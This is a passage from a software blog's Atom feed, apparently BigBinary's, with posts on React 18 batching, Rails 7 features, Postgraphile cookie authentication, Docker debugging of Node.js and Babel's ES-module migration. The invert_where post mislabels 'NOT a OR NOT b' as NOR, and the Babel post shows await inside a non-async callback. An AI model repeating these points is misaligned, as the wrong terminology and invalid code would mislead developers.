=&gt; {    setCount(count + 1);    setFlag(!flag);  }, 1000);};</code></pre><h3>Native event handlers</h3><pre><code class="language-jsx">const el = document.getElementById(&quot;button&quot;);el.addEventListener(&quot;click&quot;, () =&gt; {  setCount(count + 1);  setFlag(!flag);});</code></pre><p>In each of the above case, both state update calls will be batched by React andperformed together at once. This avoids re-rendering component with partiallyupdated state in any event.</p><p>In some cases, where we do not wish to batch state updates, we can use<code>flushSync</code> API from <code>react-dom</code>. This is mostly useful when one updated stateis required before updating another state.</p><pre><code class="language-jsx">import { flushSync } from &quot;react-dom&quot;;const handleClick = () =&gt; {  flushSync(() =&gt; {    setCounter(count + 1);  });  flushSync(() =&gt; {    setFlag(!flag);  });};</code></pre><p>Using <code>flushSync</code> can be used to fix breaking changes when upgrading toReact 18. There are chances that in earlier versions of React we might be usingone updated state before updating other states. Simple solution is to wrap allsuch state updates inside individual <code>flushSync</code> API.</p><p>For more detailed information on automatic batching, head to<a href="https://github.com/reactwg/react-18/discussions/21">this discussion</a>.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 7 deprecates Enumerable#sum and Array#sum]]></title>
       <author><name>Aashish Saini</name></author>
      <link href="https://www.bigbinary.com/blog/rails-7-deprecates-enumerable-sum-and-array-sum"/>
      <updated>2021-06-22T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-7-deprecates-enumerable-sum-and-array-sum</id>
      <content type="html"><![CDATA[<p>Rails 7 deprecates Enumerable#sum to the calls with non-numeric arguments. Toignore the warning we should use a suitable initial argument.</p><p>Before Rails 7</p><pre><code class="language-ruby">=&gt; %w[foo bar].sum=&gt; &quot;foobar&quot;=&gt; [[1, 2], [3, 4, 5]].sum=&gt; [1, 2, 3, 4, 5]</code></pre><p>After Rails 7</p><pre><code class="language-ruby">=&gt; %w[foo bar].sum=&gt; Rails 7.0 has deprecated Enumerable.sum in favor of Ruby's native implementation available since 2.4.   Sum of non-numeric elements requires an initial argument.=&gt; [[1, 2], [3, 4, 5]].sum=&gt; Rails 7.0 has deprecated Enumerable.sum in favor of Ruby's native implementation available since 2.4.   Sum of non-numeric elements requires an initial argument.</code></pre><p>To avoid the deprecation warning, we should use suitable argument as below.</p><pre><code class="language-ruby">=&gt; %w[foo bar].sum('')=&gt; &quot;foobar&quot;=&gt; [[1, 2], [3, 4, 5]].sum([])=&gt; [1, 2, 3, 4, 5]</code></pre><p>Check out this <a href="https://github.com/rails/rails/pull/42080">pull request</a> formore details.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 7 adds method calls for nested secrets]]></title>
       <author><name>Ashik Salman</name></author>
      <link href="https://www.bigbinary.com/blog/rails-7-adds-method-calls-for-nested-secrets"/>
      <updated>2021-06-09T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-7-adds-method-calls-for-nested-secrets</id>
      <content type="html"><![CDATA[<p>Rails stores secrets in <code>config/credentials.yml.enc</code>, which is encrypted andcannot be edited directly. You can read more about credentials management here:<a href="https://guides.rubyonrails.org/security.html#custom-credentials">Rails security guide</a>.</p><p>Rails 7 allows access to nested encrypted secrets (credentials) by method calls.We can easily access the nested secrets present in the credentials YAML filelike we've accessed top-level secrets previously:</p><pre><code class="language-YAML"># config/credentials.yml.encsecret_key_base: &quot;47327396e32dc8ac825760bb31f079225c5c0&quot;aws:  access_key_id: &quot;A6AMOGVNQKCWLNQ&quot;  secret_access_key: &quot;jfm6b9530tPu/h8v93W4TkUJN+b/ZMKkG&quot;</code></pre><pre><code class="language-ruby">=&gt; Rails.application.credentials.aws=&gt; {:access_key_id=&gt;&quot;A6AMOGVNQKCWLNQ&quot;, :secret_access_key=&gt;&quot;jfm6b9530tPu/h8v93W4TkUJN+b/ZMKkG&quot;}</code></pre><p>Before Rails 7</p><pre><code class="language-ruby">=&gt; Rails.application.credentials.aws[:access_key_id]=&gt; &quot;A6AMOGVNQKCWLNQ&quot;=&gt; Rails.application.credentials.aws.access_key_id=&gt; NoMethodError (undefined method `access_key_id' for #&lt;Hash:0x00007fb1adb0cca8&gt;)</code></pre><p>After Rails 7</p><pre><code class="language-ruby">=&gt; Rails.application.credentials.aws.access_key_id=&gt; &quot;A6AMOGVNQKCWLNQ&quot;</code></pre><p>Check out this <a href="https://github.com/rails/rails/pull/42106">pull request</a> formore details.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Using Cookies with Postgraphile]]></title>
       <author><name>Agney Menon</name></author>
      <link href="https://www.bigbinary.com/blog/cookies-with-postgraphile"/>
      <updated>2021-06-01T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/cookies-with-postgraphile</id>
      <content type="html"><![CDATA[<p>This blog details usage of cookies on a Postgraphile-based application. We willbe using Postgraphile with Express for processing the cookies, but any similarlibrary can be used.</p><p>Cookies can be a very safe method for storage on the client side. They can beset as:</p><ul><li>HTTP only: cannot be accessed through client-side JavaScript, saving it fromany third party client-side scripts or web extensions.</li><li>Secure: The web browser ensures that the cookies are set only on a <em>secure</em>channel.</li><li>Signed: We can sign the content to make sure it isn't changed on the clientside.</li><li>Same Site: Make sure that the cookie is sent only if the site matches yourdomain/subdomain (<a href="https://web.dev/samesite-cookies-explained/">details</a>)</li></ul><h2>Prerequisites</h2><ul><li>Postgraphile - Generates an instant GraphQL API from a Postgres database</li><li>Express - Minimalistic backend framework for NodeJS</li></ul><h2>Setup</h2><p>We will start off with a base Express setup generated with<a href="https://expressjs.com/en/starter/generator.html">express-generator</a>.</p><pre><code class="language-javascript">const createError = require(&quot;http-errors&quot;);const express = require(&quot;express&quot;);const path = require(&quot;path&quot;);const cookieParser = require(&quot;cookie-parser&quot;);const logger = require(&quot;morgan&quot;);const app = express();require(&quot;dotenv&quot;).config();app.use(logger(&quot;dev&quot;));app.use(express.json());app.use(express.urlencoded({ extended: false }));app.use(express.static(path.join(__dirname, &quot;public&quot;)));// Use secret key to sign the cookies on creation and parsingapp.use(cookieParser(process.env.SECRET_KEY));// Catch 404 and forward to error handlerapp.use(function (req, res, next) {  next(createError(404));});// Error handlerapp.use(function (err, req, res) {  // Set locals, only providing error in development  res.locals.message = err.message;  res.locals.error = req.app.get(&quot;env&quot;) === &quot;development&quot; ? err : {};  // Render the error page  res.status(err.status || 500);  res.render(&quot;error&quot;);});module.exports = app;</code></pre><p>From<a href="https://www.graphile.org/postgraphile/usage-library/">Postgraphile's usage library page</a>for adding Postgraphile to an express app:</p><pre><code class="language-javascript">app.use(  postgraphile(    process.env.DATABASE_URL || &quot;postgres://user:pass@host:5432/dbname&quot;,    &quot;public&quot;,    {      watchPg: true,      graphiql: true,      enhanceGraphiql: true,    }  ));</code></pre><p>Now for the table setup. We need a private <code>user_accounts</code> table and a methodnamed <code>authenticate_user</code> that will return a JWT token of the form:</p><pre><code>{  token: 'jwt_token_here',  username: '',  ...anyOtherDetails}</code></pre><p>We will not be detailing table creation or authentication as there are many waysto go about it. But if you need help,<a href="https://www.graphile.org/postgraphile/security/">Postgraphile security</a> is thepage to rely on.</p><h2>Adding the Plugin library</h2><p>To attach a cookie to the request, we will use the <code>@graphile/operation-hooks</code>library which is open-sourced<a href="https://github.com/graphile/operation-hooks">on Github</a>.</p><pre><code class="language-bash">npm install @graphile/operation-hooks# ORyarn add @graphile/operation-hooks</code></pre><p>To add the library to the app:</p><pre><code class="language-javascript">const { postgraphile, makePluginHook } = require(&quot;postgraphile&quot;);const pluginHook = makePluginHook([  require(&quot;@graphile/operation-hooks&quot;).default,  // Any more PostGraphile server plugins here]);app.use(  postgraphile(    process.env.DATABASE_URL || &quot;postgres://user:pass@host:5432/dbname&quot;,    &quot;public&quot;,    {      watchPg: true,      graphiql: true,      enhanceGraphiql: true,      pluginHook,      appendPlugins: [        // You will be adding the hooks here      ],    }  ));</code></pre><h2>Adding the Plugin</h2><p>The plugin allows for two different types of hooks:</p><ol><li><a href="https://github.com/graphile/operation-hooks#sql-hooks">SQL Hooks</a></li><li><a href="https://github.com/graphile/operation-hooks#implementing-operation-hooks-in-javascript">JavaScript Hooks</a></li></ol><p>Since accessing cookies is a JavaScript operation, we will be concentrating onthe second type.</p><p>To hook the plugin into the build system, we can use the <code>addOperationHook</code>method.</p><pre><code class="language-javascript">module.exports = function OperationHookPlugin(builder) {  builder.hook(&quot;init&quot;, (_, build) =&gt; {    // Register our operation hook (passing it the build object):    // setAuthCookie is a function we will define later.    build.addOperationHook(useAuthCredentials(build));    // Graphile Engine hooks must always return their input or a derivative of    // it.    return _;  });};</code></pre><p>If this is contained in a file named <code>set-auth-cookie.js</code>, then the plugin canbe added to the append plugins array as follows:</p><pre><code class="language-javascript">{  appendPlugins: [    require('./set-auth-cookie.js'),  ],}</code></pre><h2>Designing the hook</h2><p>The function to be executed receives two arguments: <code>build</code> process and thecurrent <code>fieldContext</code>.</p><p>The <code>fieldContext</code> consists of fields that can be used to narrow down themutation or query that we want to target; e.g. if the hook is to run only onmutations, we can use the <code>fieldContext.isRootMutation</code> field.</p><pre><code class="language-javascript">const useAuthCredentials = build =&gt; fieldContext =&gt; {  const { isRootMutation } = fieldContext;  if (!isRootMutation) {    // No hook added here    return null;  }};</code></pre><p>To direct the system on usage of the plugin, we have to return an object with<code>before</code>, <code>after</code> or <code>error</code> fields. Here is how these keywords can be used:</p><p>(comments are from<a href="https://github.com/graphile/operation-hooks-example/blob/master/hooks/logger.js">the example repository</a>)</p><pre><code class="language-javascript">return {  // An optional list of callbacks to call before the operation  before: [    // You may register more than one callback if you wish. They will be mixed in with the callbacks registered from other plugins and called in the order specified by their priority value.    {      // Priority is a number between 0 and 1000. If you're not sure where to put it, then 500 is a great starting point.      priority: 500,      // This function (which can be asynchronous) will be called before the operation. It will be passed a value that it must return verbatim. The only other valid return is `null` in which case an error will be thrown.      callback: logAttempt,    },  ],  // As `before`, except the callback is called after the operation and will be passed the result of the operation; you may return a derivative of the result.  after: [],  // As `before`; except the callback is called if an error occurs; it will be passed the error and must return either the error or a derivative of it.  error: [],};</code></pre><p>Since we want our action to happen after we get result from the mutation, wewill add it to the <code>after</code> array.</p><pre><code class="language-javascript">const useAuthCredentials = build =&gt; fieldContext =&gt; {  const { isRootMutation, pgFieldIntrospection } = fieldContext;  if (!isRootMutation) {    // No hook added here    return null;  }  if (    !pgFieldIntrospection ||    // Name of the mutation is authenticateUser    pgFieldIntrospection.name !== &quot;authenticateUser&quot;  ) {    // narrowing the scope down to the mutation we want    return null;  }  return {    before: [],    after: [      {        priority: 1000,        callback: (result, args, context) =&gt; {          // The result is here, so we can access accessToken and username.          console.log(result);        },      },    ],    error: [],  };};</code></pre><p>Since the functionality is inside the plugin hook, we do not have the expressresult to set the cookie .</p><p>But we do have an escape hatch with the third argument: <code>context</code>. Postgraphileallows us to pass functions or values into the context variable from thepostgraphile instance.</p><pre><code class="language-javascript">app.use(  postgraphile(process.env.DATABASE_URL, &quot;public&quot;, {    async additionalGraphQLContextFromRequest(req, res) {      return {        // Function to set the cookie passed into the context object        setAuthCookie: function (authCreds) {          res.cookie(&quot;app_creds&quot;, authCreds, {            signed: true,            httpOnly: true,            secure: true,            // Check if you want to include SameSite cookies here, depending on your hosting.          });        },      };    },  }));</code></pre><p>We can now set the cookie inside the plugin hook.</p><pre><code class="language-javascript">{  priority: 1000,  callback: (result, args, context) =&gt; {    // This function is passed from additionalGraphQLContextFromRequest as detailed in the snippet above    context.setAuthCookie(result);  }}</code></pre><h2>Reading from the Cookie </h2><p>We have already added the <code>cookieParser</code> with <code>SECRET_KEY</code>, so express willparse the cookies for us.</p><p>But we probably want them to be accessible inside SQL functions forPostgraphile. That is how we can determine if the user is signed in or whattheir permissions are. To do that, Postgraphile provides a <code>pgSettings</code> object.</p><pre><code class="language-javascript">app.use(  postgraphile(process.env.DATABASE_URL, &quot;public&quot;, {    pgSettings: async req =&gt; ({      user: req.signedCookies[&quot;app_creds&quot;],    }),  }));</code></pre><p>Inside an SQL function, the variables passed from settings can be accessed likethis:</p><pre><code class="language-sql">current_setting('user')</code></pre><hr><p>That's all . We can store any details in cookies, retrieve them on the Expressend and use them inside Postgres functions for authentication or authorization.</p><p>Check out <a href="https://github.com/graphile/operation-hooks">operation-hooks</a> pluginfor more details.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Debug Node.js app running in a Docker container]]></title>
       <author><name>Preveen Raj</name></author>
      <link href="https://www.bigbinary.com/blog/debug-nodejs-app-running-in-a-docker-container"/>
      <updated>2021-05-25T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/debug-nodejs-app-running-in-a-docker-container</id>
      <content type="html"><![CDATA[<p>A Docker container is a standard unit of software that packages up code and allits dependencies so the application runs quickly and reliably from one computingenvironment to another. One who have dealt with it would have wanted to debugtheir application like they do it normally, but it often feels difficult toconfigure. Let's do it in a simple way.</p><h3>1. Install <a href="https://marketplace.visualstudio.com/items?itemName=ms-azuretools.vscode-docker">Docker Extension</a> for VSCode</h3><p>&lt;img width=&quot;1791&quot; alt=&quot;VSCode_Docker_Extension&quot; src=&quot;/blog_images/2021/debug-nodejs-app-running-in-a-docker-container/vscode_docker_extension.png&quot;&gt;</p><p>This extension will be responsible for VSCode to debug an app inside the Dockercontainer. It will also enable us to manage Docker images and containers.</p><h3>2. Expose port 9229 in the docker-compose.yml</h3><p>Port <code>9229</code> is the default node.js debugging port.</p><p>This will bind the port of the container with that of the host machine enablingthe VSCode debugger to attach to the port.</p><pre><code class="language-yml">version: &quot;3.9&quot;services:  backend:    container_name: nodejs    restart: always    build:      context: .    ports:      - &quot;80:3000&quot;      - &quot;5678:5678&quot;      - &quot;9229:9229&quot;    command: yarn dev</code></pre><h5>OR</h5><blockquote><p>If you are directly running the app from command line, then you can append:<code>-p 9229:9229</code> to the docker-run command. Example:</p></blockquote><pre><code class="language-bash">docker run -d -p 80:3000 -p 9229:9229 node:15.0.1-alpine</code></pre><h3>3. Add the inspect switch to the npm script</h3><pre><code class="language-bash">nodemon --inspect=0.0.0.0:9229 --watch server server/bin/www</code></pre><p>Make sure you add the address and port to the inspect switch. When started withthe --inspect switch, a node.js process listens for a debugging client. Bydefault, it will listen to the host and port <code>127.0.0.1:9229</code>. For Docker, wewould have to update it to <code>0.0.0.0:9229</code>.</p><h3>4. Create a VSCode launch.json</h3><p>You can generate a <code>launch.json</code> from the Debug tab of VSCode. Click on the dropdown and select <strong>Add Configuration</strong>.</p><p>&lt;img width=&quot;381&quot; alt=&quot;VSCode_Debugger&quot; src=&quot;/blog_images/2021/debug-nodejs-app-running-in-a-docker-container/vscode_debugger.png&quot;&gt;</p><p>This action would generate a default JSON configuration. Replace the contentwith the below:</p><pre><code class="language-JSON">{  &quot;version&quot;: &quot;0.2.0&quot;,  &quot;configurations&quot;: [    {      &quot;name&quot;: &quot;Docker: Attach to Node&quot;,      &quot;type&quot;: &quot;node&quot;,      &quot;request&quot;: &quot;attach&quot;,      &quot;restart&quot;: true,      &quot;port&quot;: 9229,      &quot;address&quot;: &quot;localhost&quot;,      &quot;localRoot&quot;: &quot;${workspaceFolder}&quot;,      &quot;remoteRoot&quot;: &quot;/usr/src/app&quot;,      &quot;protocol&quot;: &quot;inspector&quot;    }  ]}</code></pre><h3>5. Start the docker container and attach the debugger.</h3><p>After your Docker container has been successfully launched, you can attach thedebugger to it at any time by clicking the play button in the same Debug tabwhere we built the <code>launch.json</code> configuration.</p><p>VSCode will now adjust the color of its bottom status bar to indicate that it isin debugging mode, and you are ready to go.</p><p>You can put breakpoints anywhere in your file and get your work done faster andbetter than before.</p><h4>Bonus Tip</h4><blockquote><p>Since the debugger has full access to the Node.js execution environment, amalicious agent who can bind to this port will be able to execute arbitrarycode on the Node.js process's behalf. It is important to understand thesecurity implications of exposing the debugger port on public and privatenetworks. Make sure you are not exposing the debugging port in productionenvironment.</p></blockquote>]]></content>
    </entry><entry>
       <title><![CDATA[Helping Babel move to ES Modules]]></title>
       <author><name>Karan Sapolia Sharma</name></author>
      <link href="https://www.bigbinary.com/blog/helping-babel-move-to-esm"/>
      <updated>2021-05-18T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/helping-babel-move-to-esm</id>
      <content type="html"><![CDATA[<p>The Babel project recently moved to running builds on Node.js 14, which meansthat Babel can now use<a href="https://nodejs.org/api/esm.html#esm_modules_ecmascript_modules">ES Modules</a>(ESM) instead of CommonJS (CJS) to import/export modules for internal scripts.</p><p>Also, with the upcoming Babel 8.0.0 release, the team is aiming to<a href="https://github.com/babel/babel/issues/11701">ship Babel as native ES Modules</a>.With this goal in mind, the team is shifting all CommonJS imports/exports to ESMones. This is where I got the opportunity to contribute to Babel recently.</p><h2>Why ES Modules though?</h2><p>For a very long time, JS (or ECMAScript) did not have a standardized moduleimport/export syntax. Various independent packages introduced formats to helpwork with modules in JS. Most browsers used the AMD API (Asynchronous ModuleDefinition) implemented in the Require.js package, which had its own syntax andquirks.</p><p>CommonJS on the other hand was the standard used by Node.js, and it was no lessquirky. Inconsistent formatting and<a href="https://nodejs.org/api/esm.html#esm_interoperability_with_commonjs">poor interoperability between packages</a>irked JS developers enough to demand a standard format.</p><p>Lately, the ECMAScript Standardization body (TC39) has adopted ESM (ECMAScriptmodules) as the standard format for Javascript. Most web browsers alreadysupport this format and Node.js 14 now provides<a href="https://nodejs.org/api/esm.html#esm_modules_ecmascript_modules">stable support for it</a>.</p><h2>The task at hand</h2><p>The next task was to convert all internal top-level scripts from using CommonJSto ESM. The finer details of the implementation, along with interoperabilityissues with non-ESM files, would trouble CommonJS for some time though.</p><p>The simplest of changes was to replace <code>require()</code> statements in each file with<code>import</code> statements. For example, files starting like:</p><pre><code class="language-javascript">&quot;use strict&quot;;const plumber = require(&quot;gulp-plumber&quot;);const through = require(&quot;through2&quot;);const chalk = require(&quot;chalk&quot;);</code></pre><p>would be modified like here:</p><pre><code class="language-javascript">import plumber from &quot;gulp-plumber&quot;;import through from &quot;through2&quot;;import chalk from &quot;chalk&quot;;</code></pre><p>to allow modules to be imported as ES modules.</p><p>In the above example also note that because ES modules are in strict mode bydefault, so <code>&quot;use strict&quot;;</code> declarations were removed from the beginning ofthese top-level scripts.</p><p>Almost all current NPM packages are CommonJS packages, exposing theirfunctionalities using the <code>module.exports</code> syntax.</p><p>In case a file/package exports more than one value, we need to use named importsinstead:</p><pre><code class="language-javascript">import { chalk } from &quot;chalk&quot;;</code></pre><p>Where the default export object from a CommonJS module was named differently, ithad to be aliased during import to avoid breaking pre-existing variables' namesin the files being converted to ESM. For example,</p><pre><code class="language-javascript">const rollupBabel = require(&quot;@rollup/plugin-babel&quot;).default;</code></pre><p>had to be replaced with:</p><pre><code class="language-javascript">import { babel as rollupBabel } from &quot;@rollup/plugin-babel&quot;;</code></pre><p>so we could keep using the variable <code>rollupBabel</code> in the file.</p><p>For instances where <code>require()</code> statements needed to be replaced by the dynamic<code>import()</code> statements</p><pre><code class="language-javascript">const getPackageJson = (pkg) =&gt; require(join(packageDir, pkg, &quot;package.json&quot;));// replaced byconst getPackageJson = (pkg) =&gt; import(join(packageDir, pkg, &quot;package.json&quot;));</code></pre><p>the subsequent calls everywhere now needed to be awaited:</p><pre><code class="language-javascript">   .forEach(id =&gt; {      const { name, description } = getPackageJson(id);   })   //await added   .forEach(id =&gt; {      const { name, description } = await getPackageJson(id);   })</code></pre><p>Other things like importing JSON modules are currently only supported inCommonJS mode.<a href="https://nodejs.org/api/esm.html#esm_no_json_module_loading">Those imports were left as-is</a>.</p><h2>Blockers</h2><p>With all the changes made and committed, we bumped into the next big roadblock:package dependencies. Babel uses Yarn 2 internally, and particularly the PnPfeature of Yarn 2. Unfortunately, the ESM loader API was experimental at thetime and not being used by PnP. The Babel and Yarn teams<a href="https://github.com/babel/babel/pull/12296#discussion_r546301877">coordinated to implement it</a>soon after.</p><p>Similarly, Jest has its own custom loader for ESM, which meant it could notsupport testing ESM modules with Babel.<a href="https://github.com/facebook/jest/issues/9430">That issue</a> was side-stepped forthe time being.</p><h2>Network effects</h2><p>The good thing about the whole grind of shifting from CommonJS to ESM is that alot of other major packages are also considering and implementing ESM support.The shift to ESM-only by Babel is already building confidence in others to dothe same. Special thanks to the Babel maintainers for setting a great exampleand<a href="https://twitter.com/NicoloRibaudo/status/1356030492546650115?s=20">encouraging others to move to ESM</a>.</p><h2>Conclusion</h2><p>All told, it was a great experience adding a new feature into a well-maintainedand widely-used package. The biggest lesson from this has to be how changes madein Babel affect and influence other major packages, and how maintainers ofvarious major open source packages work in tandem to avoid breaking each other'scode. It is a very open and collaborative ecosystem with people discussing andworking through github issues, comments, and even twitter threads.</p><p>Check out the <a href="https://github.com/babel/babel/pull/12296">pull request</a> for moredetails.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Failing Gracefully: Error Boundaries in React]]></title>
       <author><name>Dane David</name></author>
      <link href="https://www.bigbinary.com/blog/error-boundaries-in-react"/>
      <updated>2021-05-18T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/error-boundaries-in-react</id>
      <content type="html"><![CDATA[<p>React 16 introduced the concept of &quot;Error Boundaries&quot; within component trees.Web developers are often confused on its proper application; Should the entireapp be wrapped in a single error boundary? Or should each component be wrappedin its own error boundary so that individual breakages dont affect the wholeapp?</p><p>Below is my talk from <a href="https://reactday.in/">React Day Bangalore</a> that aims atfiguring out some common patterns and design decisions on when and where to useReact error boundaries for a fault tolerant React application.</p><p>&lt;div class=&quot;youtube-video-container&quot;&gt;&lt;iframe width=&quot;560&quot; height=&quot;315&quot; src=&quot;https://www.youtube.com/embed/t5TfkIKUJE4&quot; title=&quot;YouTube video player&quot; frameborder=&quot;0&quot; allow=&quot;accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture&quot; allowfullscreen&gt;&lt;/iframe&gt;&lt;/div&gt;</p><h2>Useful links</h2><ul><li><a href="https://drive.google.com/file/d/1e2DXRNBYwRHGPJG0KQWK1DU8neZLXSqm/view">Talk Slides</a></li><li><a href="https://www.reddit.com/r/reactjs/comments/9lp0k3/new_lifecycle_method_getderivedstatefromerror/">New lifecycle method: getDerivedStateFromError [reddit]</a></li><li><a href="https://kentcdodds.com/blog/use-react-error-boundary-to-handle-errors-in-react">react-error-boundary</a></li></ul>]]></content>
    </entry><entry>
       <title><![CDATA[Ruby 3.1 adds Array#intersect?]]></title>
       <author><name>Ashik Salman</name></author>
      <link href="https://www.bigbinary.com/blog/ruby-3-1-adds-array-intersect"/>
      <updated>2021-05-11T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/ruby-3-1-adds-array-intersect</id>
      <content type="html"><![CDATA[<p>Ruby 3.1 introduces the <code>Array#intersect?</code> method which returns boolean value<code>true</code> or <code>false</code> based on the given input arrays have common elements in it.</p><p>We already know<a href="https://ruby-doc.org/core-3.0.1/Array.html#method-i-intersection">Array#intersection or Array#&amp;</a>methods which are used to find the common elements between arrays.</p><pre><code class="language-ruby">=&gt; x = [1, 2, 5, 8]=&gt; y = [2, 4, 5, 9]=&gt; z = [3, 7]=&gt; x.intersection(y) # x &amp; y=&gt; [2, 5]=&gt; x.intersection(z) # x &amp; z=&gt; []</code></pre><p>The <code>intersection</code> or <code>&amp;</code> methods return an empty array or array having thecommon elements in it as result. We have to further call <code>empty?</code>, <code>any?</code> or<code>blank?</code> like methods to check whether two arrays intersect each other or not.</p><h2>Before Ruby 3.1</h2><pre><code class="language-ruby">=&gt; x.intersection(y).empty?=&gt; false=&gt; (x &amp; z).empty?=&gt; true=&gt; (y &amp; z).any?=&gt; false</code></pre><h2>After Ruby 3.1</h2><pre><code class="language-ruby">=&gt; x.intersect?(y)=&gt; true=&gt; y.intersect?(z)=&gt; false</code></pre><p>The <code>Array#intersect?</code> method accepts only single array as argument, but<code>Array#intersection</code> method can accept multiple arrays as arguments.</p><pre><code class="language-ruby">=&gt; x.intersection(y, z) # x &amp; y &amp; z=&gt; []</code></pre><p>The newly introduced <code>intersect?</code> method is faster than the above describedchecks using <code>intersection</code> or <code>&amp;</code> since the new method avoids creating anintermediate array while evaluating for common elements. Also new method returns<code>true</code> as soon as it finds a common element between arrays.</p><p>Here's the relevant <a href="https://github.com/ruby/ruby/pull/1972">pull request</a> and<a href="https://bugs.ruby-lang.org/issues/15198">feature discussion</a> for this change.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 7.0 adds encryption to Active Record models]]></title>
       <author><name>Akhil Gautam</name></author>
      <link href="https://www.bigbinary.com/blog/rails-7-adds-encryption-to-active-record"/>
      <updated>2021-05-04T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-7-adds-encryption-to-active-record</id>
      <content type="html"><![CDATA[<p>Before Rails 7.0, to add encryption on attributes of ActiveRecord models, we hadto use third-party gems like <a href="https://github.com/ankane/lockbox">lockbox</a> whichserved the purpose but at the cost of an additional dependency.</p><p>Before we delve deeper, let's take a look at some terms related toencryption:</p><ol><li><strong>Encrypt:</strong> to scramble a message in a way thatonly the intended person can extract the original message.</li><li><strong>Decrypt:</strong> to extract the original message from anencrypted one.</li><li><strong>Key:</strong> a string of characters used to encrypt/decrypt a message.</li><li><strong>Cipher:</strong> an algorithm used to encrypt and decrypt a message;RSA, Blowfish, and AES are some well-known examples.</li><li><strong>Deterministic:</strong> a process with guaranteed results;the sum of a set of numbers never changes.</li><li><strong>Non-deterministic:</strong> a process with unpredictable results;a roll of the dice can never be predicted.</li></ol><h3>Rails 7.0</h3><p>Rails 7.0 adds encryption to attributes at the model level. By default, itsupports encrypting serialized attribute types using the non-deterministic<code>AES-GCM</code> cipher.</p><p>To use this feature, we have to set the <code>key_derivation_salt</code>, <code>primary_key</code>, and<code>deterministic_key</code> variables in our environment file. These <code>keys</code> can be generated byrunning <code>bin/rails db:encryption:init</code>.</p><p>Let's enable encryption on the <code>passport_number</code> attribute of the <code>User</code>model.</p><pre><code class="language-ruby"># app/models/user.rbclass User &lt; ApplicationRecord  encrypts :passport_numberend</code></pre><p>In the above code, we have asked Rails to encrypt the <code>passport_number</code>attribute of <code>User</code> model when writing it to the database. Now, whenever we create a<code>User</code>, we will see the encrypted value of <code>passport_number</code> in the table,and the unencrypted value when we query using ActiveRecord.</p><pre><code class="language-ruby"># rails console&gt;&gt; User.create name: &quot;Akhil&quot;, passport_number: &quot;BKLPG564&quot;  TRANSACTION (0.1ms)  begin transaction  User Create (0.6ms)  INSERT INTO &quot;users&quot; (&quot;name&quot;, &quot;passport_number&quot;, &quot;created_at&quot;, &quot;updated_at&quot;) VALUES (?, ?, ?, ?)  [[&quot;name&quot;, &quot;Akhil&quot;], [&quot;passport_number&quot;, &quot;{\&quot;p\&quot;:\&quot;iOUC3ESsyxY=\&quot;,\&quot;h\&quot;:{\&quot;iv\&quot;:\&quot;lDdCxI3LeoPv0hxZ\&quot;,\&quot;at\&quot;:\&quot;D50hElso0YvI6d8Li+l+lw==\&quot;}}&quot;], [&quot;created_at&quot;, &quot;2021-04-15 10:27:50.800729&quot;], [&quot;updated_at&quot;, &quot;2021-04-15 10:27:50.800729&quot;]]  TRANSACTION (1.5ms)  commit transaction&gt;&gt; User.last=&gt; #&lt;User id: 1, name: &quot;Akhil&quot;, adhar: &quot;BKLPG564&quot;, created_at: &quot;2021-04-15 10:27:50.800729000 +0000&quot;, updated_at: &quot;2021-04-15 10:27:50.800729000 +0000&quot;&gt;</code></pre><p>Under the hood, Rails 7 uses the<a href="https://github.com/rails/rails/blob/9a263e9a0ffb82faa6d3153fd1f35b814a366cd5/activerecord/lib/active_record/encryption/encryptable_record.rb#L7">EncryptableRecord</a>concern to perform encryption and decryption when saving and retrieving valuesfrom the database.</p><p>Check out the <a href="https://github.com/rails/rails/pull/41659">pull request</a> for moredetails of this encryption system. It is also documented in the<a href="https://edgeguides.rubyonrails.org/active_record_encryption.html">Ruby on Rails guides</a>.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 6.1 adds invert_where method]]></title>
       <author><name>Chimed Palden</name></author>
      <link href="https://www.bigbinary.com/blog/rails-6-1-adds-invert_where"/>
      <updated>2021-05-04T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-6-1-adds-invert_where</id>
      <content type="html"><![CDATA[<p>Rails 6.1 adds an <code>invert_where</code> method that will invert all scope conditions.</p><p>Let's see an example.</p><pre><code class="language-ruby">class User  scope :active, -&gt; { where(accepted: true, locked: false) }end&gt;&gt; User.all=&gt; #&lt;ActiveRecord::Relation [#&lt;User id: 1, name: 'Rob', accepted: true, locked: true&gt;#&lt;User id: 2, name: 'Jack', accepted: false, locked: false&gt;#&lt;User id: 3, name: 'Nina', accepted: true, locked: false&gt;#&lt;User id: 4, name: 'Oliver', accepted: false, locked: true&gt;</code></pre><p>Now let's query for active and inactive users</p><pre><code class="language-ruby">&gt;&gt; User.active# SELECT * FROM Users WHERE `accepted` = 1 AND `locked` = 0=&gt; #&lt;ActiveRecord::Relation [#&lt;User id: 3, name: 'Nina', accepted: true, locked: false&gt;]&gt;&gt;&gt; User.active.invert_where# SELECT * FROM Users WHERE NOT (`accepted` = 1 AND `locked` = 0)=&gt; #&lt;ActiveRecord::Relation [#&lt;User id: 1, name: 'Rob', accepted: true, locked: true&gt;#&lt;User id: 2, name: 'Jack', accepted: false, locked: false&gt;#&lt;User id: 4, name: 'Oliver', accepted: false, locked: true&gt;]&gt;</code></pre><p>As we can see above, if we use <code>invert_where</code> with multiple attributes, itapplies logical <code>NOR</code>, which is <code>NOT a OR NOT b</code>, to the WHERE clause of thequery. Using DeMorgan's Law, it can also be written as <code>NOT (a AND b)</code> tomatch the second output.</p><p>Check out the <a href="https://github.com/rails/rails/pull/40249">pull request</a> for moredetails.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 7 adds Enumerable#sole]]></title>
       <author><name>Ashik Salman</name></author>
